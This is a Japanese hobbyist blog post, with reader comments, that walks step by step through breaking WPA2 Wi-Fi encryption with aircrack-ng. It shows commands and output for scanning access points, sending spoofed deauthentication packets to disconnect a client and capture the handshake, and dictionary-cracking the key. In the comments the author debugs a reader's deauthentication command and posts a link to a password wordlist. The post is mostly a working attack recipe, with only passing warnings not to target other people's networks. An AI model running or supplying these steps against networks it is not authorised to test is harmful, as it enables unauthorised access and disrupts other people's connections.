スポンサーサイト

/ スポンサー広告 / Comment[-]

aircrack-ngでwpa破り

/ Hack / Comment[5]
上記の広告は1ヶ月以上更新のないブログに表示されています。
新しい記事を書く事で広告が消せます。
wepは前にやったけどwpaはまだやってないからやってみた


wlan0をモニターモードに
# airmon-ng start wlan0



APを列挙
# airodump-ng mon0
 CH  1 ][ Elapsed: 0 s ][ 2011-10-10 20:39                                     

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:22:CF:AA:AA:AA -59 2 10 0 1 54e. WPA2 CCMP PSK
BSSID STATION PWR Rate Lost Packets Probes

00:22:CF:AA:AA:AA 00:22:CF:BB:BB:BB -63 0e- 0e 1 10
^C

状況:
00:22:cf:aa:aa:aaがターゲットAP
ターゲットには別クライアント00:22:cf:bb:bb:bbが接続中



パケットをキャプチャ開始
# airodump-ng --bssid 00:22:CF:AA:AA:AA -c 1 -w wpa mon0



ソースアドレスを偽装したDeAuthパケットを送信してターゲットAPからクライアントを切断させ、その際に発生するWPAハンドシェイクパケットをかすめ取る
# aireplay-ng -0 20 -a 00:22:CF:AA:AA:AA -c 00:22:CF:BB:BB:BB mon0
21:01:46  Waiting for beacon frame (BSSID: 00:22:CF:BB:BB:BB) on channel 1
21:01:46 Sending 64 directed DeAuth. STMAC: [00:22:CF:BB:BB:BB] [19|64 ACKs]
21:01:46 Sending 64 directed DeAuth. STMAC: [00:22:CF:BB:BB:BB] [19|64 ACKs]
21:01:46 Sending 64 directed DeAuth. STMAC: [00:22:CF:BB:BB:BB] [19|64 ACKs]
:

大体10~20くらいDeAuthを送るとハンドシェイクパケットを入手できる。
このDeAuthパケットを送る機能は無線LANカメラや不正クライアントの切断とかにも使えたりする。他人のAP、クライアントにはやっちゃダメだよ



WPAハンドシェイクパケットが入手できたら辞書クラック開始
# aircrack-ng wpa-01.cap -w password.lst
                                 Aircrack-ng 1.0


[00:00:00] 16 keys tested (176.17 k/s)


KEY FOUND! [ roottoor ]
:

WPAハンドシェイクパケットさえ手に入れば、あとは自宅に持ち帰ってデカい辞書ファイルとハイスペックマシンでゆっくりと料理してやればおk
他人のAPではやっちゃダメだよ
関連記事

コメント

それは初めて見た表示ですねぇ。
意訳すると「mon0の現在のチャンネルが確定されていないため、--ignore-negative-oneオプションを付け加えるか、カーネルパッチを当ててください」とあります。
次のコマンドを試してみてください。
# aireplay-ng -0 20 -a AA:AA:AA:AA:AA:AA -c BB:BB:BB:BB:BB:BB --ignore-negative-one mon0

それとMACアドレスではなくESSIDでも試してみてください。
# aireplay-ng -0 20 -a targetESSID -c clientESSID --ignore-negative-one mon0

それでもダメな場合は申し訳ないですが分かりません。
おそらく同じ症状の解決例が書かれているフォーラムのURLを貼っておきます。
forum.aircrack-ng.org/index.php?topic=340.0

| URL | 長倉 怜二#QsyfyZoo

# aireplay-ng -0 20 -a 00:22:CF:AA:AA:AA -c 00:22:CF:BB:BB:BB mon0
これを入力すると下の文が出てきて進めません
カーネルが入ってないのですかね?
Waiting for beacon frame (BSSID: aa:aa:aa:aa:aa:aa) on channel -1
Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
Please specify an ESSID (-e).

| URL | ちきn#-

辞書ファイルありがとうございます

辞書ファイルありがとうございます。

| URL | xenc#-

コメントありがとうございます。

辞書ファイルは、結構前にoffensive-securityなどから入手した記憶があります。
残念ながらURLは忘れてしまいましたが・・・

とりあえず手元にある辞書ファイルをうpしておきますね。
http://www1.axfc.net/uploader/Li/so/125380&key=a

| URL | 長倉 怜二#YqiWHrhw

いつも参考にさせていただいています

こんにちは。質問です。
辞書ファイルはどこでてにいれているのでしょうか?
教えてください><

| URL | ぴっぐ#-

:
:
:
:
:
管理人のみ表示を許可